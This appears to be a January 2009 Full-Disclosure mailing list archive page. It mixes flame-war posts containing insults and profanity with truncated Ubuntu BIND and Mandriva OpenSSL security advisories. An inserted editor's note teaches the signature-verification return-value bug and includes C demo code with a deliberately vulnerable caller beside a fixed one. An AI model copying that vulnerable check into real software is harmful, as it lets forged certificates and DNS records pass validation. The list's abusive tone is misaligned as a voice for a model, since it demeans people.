n3td3v fits into this profile perfectly. No one takes n3td3v seriously.. not even n3td3v. I guess you have to give credit where it's due... n3td3v is the master troll... and even though I know he's a troll, he still gets me! btw, that wasn't a compliment. fuck you and die.

On Fri, Jan 9, 2009 at :23 AM, n3td3v xploita...@gmail.com wrote:

This is the average user response from full-disclosure, no capacity to have a serious conversation.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
LOL. Do you now feel like a big man for calling people kids and alluding to the fact you know people? Feel like an internet scholar because you use the phrase nuke? You bitch that people don't take their wars offline, but you contribute to the noise on the list with this post.. so what is your beef, tough guy? Next time you might try shutting the fuck up rather than showing off how inept you are at doing menial tasks without help.. like deciding who to filter.

On Fri, Jan 9, 2009 at :40 AM, Steve Clement st...@localhost.lu wrote:

Can everyone please reply to this thread so I know who hates who (it's for my Social profile of this list). But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already, it's easy and I know people that know people to provide the pure stuff). Anyways kids, Cheers. Steve Clement
[Full-disclosure] [USN-706-1] Bind vulnerability
===========================================================
Ubuntu Security Notice USN-706-1           January 09, 2009
bind9 vulnerability
CVE-2009-0025
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libdns21                        1:9.3.2-2ubuntu1.6

Ubuntu 7.10:
  libdns32                        1:9.4.1-P1-3ubuntu2.1

Ubuntu 8.04 LTS:
  libdns35                        1:9.4.2.dfsg.P2-2ubuntu0.1

Ubuntu 8.10:
  libdns43                        1:9.5.0.dfsg.P2-1ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Bind did not properly perform certificate
verification. When DNSSEC with DSA certificates are in use, a remote
attacker could exploit this to bypass certificate validation to spoof
DNS entries and poison DNS caches. Among other things, this could lead
to misdirected email and web traffic.

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6.diff.gz
      Size/MD5:   105531 995d2d32dc536b1f1588e0045136d721
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6.dsc
      Size/MD5:      773 9a95c6923ba106b13ea215b38779f370
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2.orig.tar.gz
      Size/MD5:  5302112 55e709501a7780233c36e25ccd15ece2

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.2-2ubuntu1.6_all.deb
      Size/MD5:   180884 49c34a9d28b1224c821c0a5bce3a0e36

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   112190 ae997c07b41237003f4c423253f1f426
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   311696 8bfff8812ec9e7867b1b2ab80d44a86b
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   185022 b870965df596d4ca019ebdeb0782c892
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:  1130226 2902f9d2ff4a95ede317ca18b32e6296
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:    92266 083a7b72fd1f55ce61c97f435dd57934
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   557428 a2a48eada6c6a5b4499cddfd9a66e841
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   190708 17a0b44a527ef02cc4a67e06261e8656
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:    93392 4fa6e6d08766904ede6395a5ff2f0434
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   109210 1569703c099b0b9f1bca42832218bc10
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   111662 92818aee70aa8993a75df11bdcbacb62
    http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.6_amd64.deb
      Size/MD5:   220104 25e3b49f861b3cb9291dd68ee74614fb

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:   109048 6d4033c5d66cd1e6beb55373238d613f
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:   290004 f550b9df7e2a1f56466f6836d9f04f72
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:   175698 68cbf10bb443e7a28752fe78646b2ec5
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:   997228 7e457fac8b3e3939e0032af64755ddf7
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:    91478 afbb74eff710a5123890abc4442260a9
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:   483080 38e35b2b6baaf03c26e5051aeffa0c9c
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:   172718 36369d72a18d62845c91a87d87db0417
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:    90930 9710baa7d93e622cec8ddffa46ce269b
    http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.6_i386.deb
      Size/MD5:
Re: [Full-disclosure] The war in Palestine
THIS IS A COMPUTER SECURITY MAILING LIST. No one cares about your opinion on this horseshit... at least n3td3v stays vaguely on topic (no matter how skewed his thoughts may be)
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Two or three web application bugs for Google Groups to secure it to cover my own back, I'm not the kind of guy who releases bugs from random software for no reason to look cool. I secured my Google Group, I have no reason else to secure anything else. If a new bug for Google Groups comes up, one day there may be another release from me. There are too many folks out there securing things for random reasons just to look cool :) Have a real reason to release bugs, have a good story behind your releases like I do. Even me starting to use Twitter has a big story behind it because someone started the account to make fun of me, I emailed Twitter, they gave me the account, I post it to full-disclosure just to rub it in the previous owner's face.

On Thu, Jan 8, 2009 at 11:49 PM, Ureleet urel...@gmail.com wrote:

gobbles has released. what have u released
[Full-disclosure] [ MDVSA-2009:001 ] openssl
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:001
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : openssl
 Date    : January 8, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability was found by the Google Security Team with how OpenSSL
 checked the verification of certificates. An attacker in control of a
 malicious server or able to effect a man-in-the-middle attack, could
 present a malformed SSL/TLS signature from a certificate chain to a
 vulnerable client, which would then bypass the certificate validation
 (CVE-2008-5077).

 The updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 6585e08eab279e6a249630385683bf43  2008.0/i586/libopenssl0.9.8-0.9.8e-8.2mdv2008.0.i586.rpm
 b5955c2c0a2cc24abd9f5f3ebc7d0148  2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.2mdv2008.0.i586.rpm
 7c92323d7aa583b936ef908f3f6ac867  2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.i586.rpm
 2b791168311c3ecba4f8b7acd24e64ab  2008.0/i586/openssl-0.9.8e-8.2mdv2008.0.i586.rpm
 cf51c48e4c05ac5357f6076fbaeff0a5  2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6259ac0067eee59f888bc516bc3a  2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.2mdv2008.0.x86_64.rpm
 fe745327c1bbb599e025a5b90bb05817  2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm
 bdb7113b06aab0c4d77cbf86bcf208c2  2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm
 d4fda198a80b88c7caaf947af0866df8  2008.0/x86_64/openssl-0.9.8e-8.2mdv2008.0.x86_64.rpm
 cf51c48e4c05ac5357f6076fbaeff0a5  2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 4a0be98cd3fb82a22e3836c5ae81ed37  2008.1/i586/libopenssl0.9.8-0.9.8g-4.2mdv2008.1.i586.rpm
 277058ecc1d26d24bf4da5ea27d4a31f  2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.2mdv2008.1.i586.rpm
 29b08a5a233f1987c4ca98aaa4e97ac5  2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.i586.rpm
 e47be879abc0c089a8f380469a6a62c8  2008.1/i586/openssl-0.9.8g-4.2mdv2008.1.i586.rpm
 7395d0e10c1938be16261baba05da55c  2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 71a69804b928a9f7856f65fee332c5ab  2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.2mdv2008.1.x86_64.rpm
 e9c5d1d4895a5a679945bde62df6f988  2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm
 7f2d66839f93e2083dcd1b1f27ca4ddf  2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm
 40408ffdf13faa6c79b28c764bb88b22  2008.1/x86_64/openssl-0.9.8g-4.2mdv2008.1.x86_64.rpm
 7395d0e10c1938be16261baba05da55c  2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 2512f6a41e9a8e7bcff53e5737029689  2009.0/i586/libopenssl0.9.8-0.9.8h-3.1mdv2009.0.i586.rpm
 d7774faaed2866da5bb05cbcf07604da  2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.1mdv2009.0.i586.rpm
 ed99160bdf1ce33fa81dc47c71915318  2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.i586.rpm
 6116fafed014596ee1e6ec43db93133f  2009.0/i586/openssl-0.9.8h-3.1mdv2009.0.i586.rpm
 8ad6b0d8aff3bb992d716668450aef3a  2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 d2cc04fc0bdaeea8e4cc5d7ab4e997fd  2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.1mdv2009.0.x86_64.rpm
 b537da3113c75f87c4fa8d66be2d6797  2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm
 ef9add2bec302b324b9c0690cf79b57c  2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm
 16b8c11f4d6dedf2e4176bfc55607c15  2009.0/x86_64/openssl-0.9.8h-3.1mdv2009.0.x86_64.rpm
 8ad6b0d8aff3bb992d716668450aef3a  2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm

 Corporate 3.0:
 5e8f4b7c1e646d0e16af2d83238a011b  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.9.C30mdk.i586.rpm
 5115d911b9a6842fd0c3495429c7c2f2  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.9.C30mdk.i586.rpm
 b934b4f9686deef6cb1eba750ab36288  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.9.C30mdk.i586.rpm
 11ec8a4df261d4d4fa9957d33be08604  corporate/3.0/i586/openssl-0.9.7c-3.9.C30mdk.i586.rpm
 dcd1a4feb1a04302c54465dce7c7c506  corporate/3.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 64521521330df90b42c9c37cafe50b54  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.9.C30mdk.x86_64.rpm
 3a85c30c0511e42ec76c80e08efe5192
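Editor's note on the two advisories above (USN-706-1 for BIND, CVE-2009-0025, and MDVSA-2009:001 for OpenSSL, CVE-2008-5077): both come from the same defect. OpenSSL's signature verification routines (EVP_VerifyFinal, DSA_verify, DSA_do_verify) return 1 for a valid signature, 0 for an invalid one, and -1 when the signature cannot be decoded at all. The affected callers, in OpenSSL's own TLS code and in BIND's DNSSEC DSA validation, only tested the result against 0, so a malformed signature that produced -1 was accepted as if it had verified. The block below is an added example, not code from either advisory and not OpenSSL or BIND source: it uses a stand-in verify function with the same 1/0/-1 contract (its 8-byte r||s signature layout and toy keyed digest are constructed for the example and are not DSA) and places the pre-fix caller beside the corrected one.

```c
/*
 * Added example, not vendor code: the return-value bug behind CVE-2008-5077
 * and CVE-2009-0025. mock_dsa_do_verify() mimics the 1 / 0 / -1 contract of
 * OpenSSL's DSA_do_verify / EVP_VerifyFinal; its signature format and digest
 * are constructed for this example only.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SIG_LEN 8 /* r (4 bytes) || s (4 bytes), big-endian; constructed layout */

static uint32_t load_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static void store_be32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

/* Toy keyed digest (FNV-1a folded with the key); stands in for SHA-1 + DSA math. */
static uint32_t toy_digest(const unsigned char *msg, size_t len, uint32_t key)
{
    uint32_t h = 2166136261u ^ key;
    for (size_t i = 0; i < len; i++) {
        h ^= msg[i];
        h *= 16777619u;
    }
    return h;
}

/* Demo/test helper: builds a signature the mock accepts (s = r XOR digest). */
void toy_sign(const unsigned char *msg, size_t len, uint32_t key, uint32_t r,
              unsigned char sig[SIG_LEN])
{
    store_be32(sig, r);
    store_be32(sig + 4, r ^ toy_digest(msg, len, key));
}

/* Same contract as OpenSSL: 1 = good signature, 0 = bad signature, -1 = error. */
int mock_dsa_do_verify(const unsigned char *msg, size_t len,
                       const unsigned char *sig, size_t sig_len, uint32_t key)
{
    if (sig == NULL || sig_len != SIG_LEN)
        return -1; /* malformed: cannot be decoded as r||s */
    uint32_t r = load_be32(sig), s = load_be32(sig + 4);
    return ((r ^ s) == toy_digest(msg, len, key)) ? 1 : 0;
}

/* Pre-fix caller: only 0 is failure, so the -1 error path is accepted. */
int verify_vulnerable(const unsigned char *msg, size_t len,
                      const unsigned char *sig, size_t sig_len, uint32_t key)
{
    int status = mock_dsa_do_verify(msg, len, sig, sig_len, key);
    return (status == 0) ? 0 : 1;
}

/* Fixed caller: anything other than the documented success value is failure. */
int verify_fixed(const unsigned char *msg, size_t len,
                 const unsigned char *sig, size_t sig_len, uint32_t key)
{
    int status = mock_dsa_do_verify(msg, len, sig, sig_len, key);
    return (status == 1) ? 1 : 0;
}

/* Constructed inputs: a fake signed record and a fake public key. */
static const unsigned char MSG[] = "www.example.net. IN A 192.0.2.10";
static const uint32_t KEY = 0xA5A5A5A5u;

/* Each scenario returns the caller's decision: 1 = accept, 0 = reject. */
int case_valid_signature(int use_fixed)
{
    unsigned char sig[SIG_LEN];
    toy_sign(MSG, sizeof MSG - 1, KEY, 0x01020304u, sig);
    return use_fixed ? verify_fixed(MSG, sizeof MSG - 1, sig, SIG_LEN, KEY)
                     : verify_vulnerable(MSG, sizeof MSG - 1, sig, SIG_LEN, KEY);
}

int case_tampered_signature(int use_fixed)
{
    unsigned char sig[SIG_LEN];
    toy_sign(MSG, sizeof MSG - 1, KEY, 0x01020304u, sig);
    sig[7] ^= 0x01; /* well-formed but wrong: verify returns 0, both callers reject */
    return use_fixed ? verify_fixed(MSG, sizeof MSG - 1, sig, SIG_LEN, KEY)
                     : verify_vulnerable(MSG, sizeof MSG - 1, sig, SIG_LEN, KEY);
}

int case_malformed_signature(int use_fixed)
{
    unsigned char garbage[3] = { 0x30, 0x01, 0x00 }; /* undecodable: verify returns -1 */
    return use_fixed ? verify_fixed(MSG, sizeof MSG - 1, garbage, sizeof garbage, KEY)
                     : verify_vulnerable(MSG, sizeof MSG - 1, garbage, sizeof garbage, KEY);
}

int main(void)
{
    printf("valid     vulnerable=%d fixed=%d\n", case_valid_signature(0), case_valid_signature(1));
    printf("tampered  vulnerable=%d fixed=%d\n", case_tampered_signature(0), case_tampered_signature(1));
    printf("malformed vulnerable=%d fixed=%d\n", case_malformed_signature(0), case_malformed_signature(1));
    return 0;
}
```

The malformed case is the one the advisories describe: a signature that does not even parse makes the vulnerable caller accept the record or certificate chain, while the fixed caller rejects it. The general lesson for any tri-state verify API is to compare against the single documented success value rather than against the failure value.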
[Full-disclosure] The war in Palestine Pointless noise.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Paul..

* Paul Schmehl [pschmehl_li...@tx.rr.com] said..
[too much]

We expect noise from n3td3v, and despite his ph33rsome skills he is no match for a well-written procmail rule. I am surprised however that you seem unable to give it a rest on this topic that is so clearly off-topic. While I do have opinions on this episode, I am not so vain as to think the readers on this list care about it and not so arrogant as to keep the topic going despite pleas to get off-topic threads killed. I'm not sure about others on the list, but I thought more of you (and thought more of your respect for other list members).

\emm_aich

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAklm99kACgkQZtiOfLMN7yzIFAQAnLdHT5A15vEs0rsr9r/iGkoBdOKY
fcJbmdCtT3miZ7dToDZiq9Zvdf8jDZ2kwUewkoalicbNzKCQURNagshaAk3MwZz74Y5b
Is8PF6B0tte+RZuEYD5rCJSrMsXzMoFRgmHol8oOI7LoKweFJJic9QP109uqZwWpYVba
pR6FQTE=
=674i
-----END PGP SIGNATURE-----
[Full-disclosure] Do you use nepenthes?
I am looking for someone who uses nepenthes on Linux, because I have a question about nepenthes on Gentoo Linux.